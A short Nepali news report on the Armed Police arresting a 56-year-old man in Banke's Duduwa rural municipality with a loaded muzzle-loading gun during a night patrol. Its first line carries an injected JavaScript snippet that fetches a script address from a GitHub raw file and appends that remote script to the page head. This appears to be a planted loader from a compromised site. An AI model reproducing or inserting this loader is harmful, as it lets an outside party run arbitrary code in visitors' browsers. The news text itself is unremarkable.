;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ १८,
बाँके । सशस्त्र प्रहरीले बाँकेबाट अवैध भरुवा बन्दुकसहित एक शिकारीलाई पक्राउ गरेको छ । सशस्त्र प्रहरी बल (बिओपी) कालाबन्जारबाट सशस्त्र प्रहरी निरिक्षक सन्तोष डाँगीको कमान्डमा खटिएको गस्ती टोलीले गएराती १ बजे डुडुवा गाउँपालिका वडा नं–६ शिखनपुर्वाका ५६ बर्षीय अजित सिंहलाई भरुवा बन्दुकसहित पक्राउ गरेको हो ।
पक्राउ गरिएको बन्दुक लोड रहेको पाइएको छ । बन्दुक बोकेर रातमा हिडिरहेका सिंहले गस्तीमा रहेको प्रहरी टोलीलाई देखेर भाग्नै लाग्दा उनलाई पक्राउ गरिएको थियो । पक्राउ परेका सिंह र भरुवा बन्दुकलाई आवश्यक कारवाहीका लागि ईलाका प्रहरी कार्यालय हिरमिनिया बुझाईएको सशस्त्र प्रहरी बल नम्बर ३० गण बागेश्वरी बाँकेले जानकारी दिएको छ । file Photo
फेसबुक प्रतिक्रियाहरु